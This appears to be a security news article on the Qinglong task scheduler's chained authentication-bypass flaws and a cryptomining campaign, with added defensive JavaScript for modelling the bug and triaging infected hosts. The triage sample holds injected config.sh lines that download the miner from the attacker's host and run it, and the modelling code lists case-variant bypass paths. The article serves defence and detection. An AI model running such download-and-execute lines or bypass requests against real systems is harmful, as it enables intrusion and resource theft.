Attackers are chaining two critical vulnerabilities in the popular Qinglong task scheduler to deploy cryptominers on developer servers, with exploitation occurring before the flaws were publicly disclosed.
Security researchers have discovered a concerning trend where attackers are exploiting two critical vulnerabilities in the Qinglong open-source task scheduling tool to deploy cryptominers on developer servers. The exploitation campaign began in early February 2026, before the security issues were publicly disclosed at the end of that month, according to researchers at cloud-native application security company Snyk.
What is Qinglong?
Qinglong is a self-hosted open-source time management platform that has gained significant popularity among Chinese developers. The project has been forked more than 3,200 times and boasts over 19,000 stars on GitHub, indicating its widespread adoption in developer communities. Its functionality makes it an attractive target for attackers seeking to compromise developer workstations and servers.
The Vulnerabilities
The security issues impact Qinglong versions 2.20.1 and older and can be chained together to achieve remote code execution:
CVE-2026-3965: A misconfigured rewrite rule maps '/open/' requests to '/api/', unintentionally exposing protected admin endpoints through an unauthenticated path. This creates a bypass that allows attackers to access sensitive API endpoints without proper authentication.
CVE-2026-4047: The authentication check treats paths as case-sensitive (/api/), while the router matches them case-insensitively. This allows requests like '/aPi/...' to bypass authentication and reach protected endpoints that should otherwise be secured.
The root cause in both flaws is a mismatch between middleware authorization logic and Express.js routing behavior. "Both vulnerabilities stem from a mismatch between the security middleware's assumptions and the framework's behavior," Snyk researchers explain. "The auth layer assumed certain URL patterns would always be handled one way, while Express.js treated them differently."
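The mismatch the researchers describe is easiest to see in code. The following is an added example written for this article, not code from Qinglong, Snyk or Express: it models an auth middleware that does a case-sensitive prefix check on the raw request path, a '/open/' to '/api/' rewrite that runs after that check, and a router that (like Express by default) matches routes case-insensitively. The route table, the rewrite helper and all function names are assumptions for illustration; the hardened variant makes the auth decision on the same normalized path the router will dispatch on, which is the class of fix the article attributes to PR #2941.

```javascript
// Added example, not code from Qinglong or Snyk: a minimal model of the two
// middleware/router mismatches described in the article, with a hardened check
// beside the vulnerable one. Route table and helper names are assumptions.

// Express matches routes case-insensitively unless the router is created with
// { caseSensitive: true }; the /i flag models that default for handlers under /api/.
const PROTECTED_ROUTE = /^\/api\/.+/i;

function routerMatchesProtected(path) {
  return PROTECTED_ROUTE.test(path);
}

// Modelled rewrite rule: '/open/<rest>' is forwarded to '/api/<rest>', and in the
// vulnerable ordering this happens only after the auth middleware has run.
function rewriteOpenToApi(path) {
  return path.startsWith('/open/') ? '/api/' + path.slice('/open/'.length) : path;
}

// Vulnerable pattern: a case-sensitive prefix test on the raw request path,
// so '/aPi/...' looks public, and '/open/...' looks public because the rewrite
// to '/api/...' has not happened yet.
function vulnerableAuthRequired(rawPath) {
  return rawPath.startsWith('/api/');
}

// Hardened pattern: apply the same rewrite and the same case folding the router
// uses, then ask the router's own matcher whether the endpoint is protected.
// Both layers now agree on what "under /api/" means.
function normalizeForAuth(rawPath) {
  return rewriteOpenToApi(rawPath).toLowerCase();
}

function hardenedAuthRequired(rawPath) {
  return routerMatchesProtected(normalizeForAuth(rawPath));
}

// Runs one request through middleware, then rewrite, then router, and reports
// whether a protected handler is reached without the middleware demanding auth.
function simulate(rawPath, authRequiredFn) {
  const authRequired = authRequiredFn(rawPath);
  const dispatched = rewriteOpenToApi(rawPath);
  const reachesProtected = routerMatchesProtected(dispatched);
  return { rawPath, authRequired, reachesProtected, bypass: reachesProtected && !authRequired };
}

// Regression table a project could keep in its test suite: every row must end
// up with bypass === false once the middleware is fixed.
const REGRESSION_PATHS = ['/api/system', '/aPi/system', '/API/system', '/open/system', '/public/index.html'];

function checkAll(authRequiredFn, paths = REGRESSION_PATHS) {
  return paths.map(p => simulate(p, authRequiredFn));
}
```

Note that `hardenedAuthRequired` is deliberately more conservative than the vulnerable check: it treats anything the router could route to a protected handler as protected. The alternative fix, constructing the Express router with `caseSensitive: true`, closes only the case-folding mismatch and still leaves the rewrite ordering to be handled.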
The Exploitation Campaign
Snyk reports that attackers have been targeting these two flaws on publicly exposed Qinglong panels to deploy cryptominers since February 7, 2026. This activity was first spotted by Qinglong users, who reported a rogue hidden process named '.fullgc' utilizing between 85% and 100% of their CPU power. The name deliberately mimics "Full GC," an innocuous but resource-intensive process, to evade detection.
According to Snyk's analysis, the attackers exploited the flaws to modify Qinglong's config.sh and injected shell commands that downloaded a miner to '/ql/data/db/.fullgc' and executed it in the background. The remote resource located at 'file.551911.xyz' hosted multiple variants of the binary, including for Linux x86_64, ARM64, and macOS, demonstrating the attackers' preparation for different environments.

Timeline of Events
The attacks continued with multiple confirmed infections across various setups, including those behind Nginx and SSL proxies, indicating that the attackers were adapting their methods to bypass common security measures. Meanwhile, the Qinglong maintainers only responded to the situation on March 1, 2026.
The maintainer acknowledged the vulnerability and urged users to install the latest update. However, the mitigation in pull request #2924 focused on blocking command injection patterns, which Snyk researchers determined was insufficient to address the underlying authentication bypass issues.
The effective fix came in PR #2941, which corrected the authentication bypass in the middleware by properly aligning the security checks with Express.js routing behavior. This fix addresses the root cause of both vulnerabilities rather than just attempting to block specific attack patterns.
Impact and Mitigation
The exploitation of these vulnerabilities represents a significant threat to developers who use Qinglong for task scheduling. The cryptominer deployment not only consumes valuable system resources but can also lead to longer-term security implications, as compromised systems may be used as entry points for further attacks or as part of botnets.
For users running Qinglong versions 2.20.1 or older, the immediate action should be to upgrade to the latest patched version. The official Qinglong GitHub repository contains the necessary updates and information about the fixes. Additionally, users should:
- Review their systems for any signs of compromise, particularly looking for the '.fullgc' process
- Check for unauthorized modifications to configuration files
- Monitor CPU usage for unexpected spikes
- Consider implementing network segmentation to limit the potential impact of a compromise
- Audit all scripts and processes running on their Qinglong installation
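The first three checks in the list above can be turned into a small triage script. The following is an added example, not code from Snyk or the Qinglong project: it applies the indicators the article names (the '.fullgc' process name, the '/ql/data/db/.fullgc' path and the 'file.551911.xyz' host) to constructed samples of `ps` output and a config.sh. The `ps` column layout, the CPU threshold and the sample contents are assumptions; `<variant>` stands in for a remote filename the article does not give.

```javascript
// Added example (not from Snyk or the Qinglong project): triage helpers that apply
// the article's indicators to constructed samples. Thresholds, the assumed
// `ps -eo pid,pcpu,comm` layout and the sample text are illustration only.

const IOC_PROCESS_NAME = '.fullgc';
const IOC_DOMAIN = 'file.551911.xyz';
const IOC_PATH = '/ql/data/db/.fullgc';

// Parses lines shaped like `ps -eo pid,pcpu,comm` output (assumed layout: PID %CPU COMMAND).
function parsePs(psText) {
  return psText.trim().split('\n').slice(1).map(line => {
    const [pid, pcpu, ...comm] = line.trim().split(/\s+/);
    return { pid: Number(pid), pcpu: Number(pcpu), comm: comm.join(' ') };
  });
}

// Flags the known miner name and, more generally, any dot-prefixed (hidden-style)
// command name burning a lot of CPU. The 80% default threshold is an assumed knob.
function suspiciousProcesses(psText, cpuThreshold = 80) {
  return parsePs(psText).filter(p =>
    p.comm === IOC_PROCESS_NAME || (p.comm.startsWith('.') && p.pcpu >= cpuThreshold));
}

// Flags config.sh lines that mention the article's indicators, or that fetch
// anything into a dot-file (a heuristic that can also hit benign lines; treat
// matches as leads for manual review, not verdicts).
const FETCH_TO_DOTFILE = /\b(curl|wget)\b.*\/\.[\w-]+/;

function suspiciousConfigLines(configText) {
  return configText.split('\n')
    .map((text, i) => ({ line: i + 1, text }))
    .filter(({ text }) =>
      text.includes(IOC_DOMAIN) || text.includes(IOC_PATH) || FETCH_TO_DOTFILE.test(text));
}

// Constructed samples. The second hidden process shows the generic rule firing
// on a name that is not the published indicator.
const SAMPLE_PS = [
  '  PID %CPU COMMAND',
  '    1  0.0 node',
  '  412  1.2 nginx',
  ' 7731 97.4 .fullgc',
  ' 8002  0.3 bash',
  ' 8100 91.0 .cache-helper',
].join('\n');

const SAMPLE_CONFIG = [
  '## constructed sample of a config.sh with two injected lines',
  'MY_TIMEOUT="30"',
  'MY_NOTIFY="off"',
  'curl -s http://file.551911.xyz/<variant> -o /ql/data/db/.fullgc',
  'nohup /ql/data/db/.fullgc >/dev/null 2>&1 &',
].join('\n');

function triageReport() {
  return {
    processes: suspiciousProcesses(SAMPLE_PS),
    configLines: suspiciousConfigLines(SAMPLE_CONFIG),
  };
}
```

On a real host the same functions would be fed the output of `ps -eo pid,pcpu,comm` and the contents of the installation's config.sh; a non-empty result from either is a reason to preserve the file and process metadata before cleaning up, since the article notes the binary is downloaded rather than shipped with Qinglong.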
The incident highlights the importance of proper input validation, consistent authentication checks, and thorough testing of security controls in web applications. The mismatch between middleware assumptions and framework behavior is a common pitfall in web development that can lead to serious security vulnerabilities.
For organizations running Qinglong in production environments, this incident serves as a reminder of the importance of regular security assessments, prompt patching, and monitoring for unusual activity that might indicate a compromise.
The Qinglong project's GitHub repository contains detailed information about the vulnerabilities and the fixes applied. Developers are encouraged to review the security announcements and update their installations promptly to protect against ongoing exploitation attempts.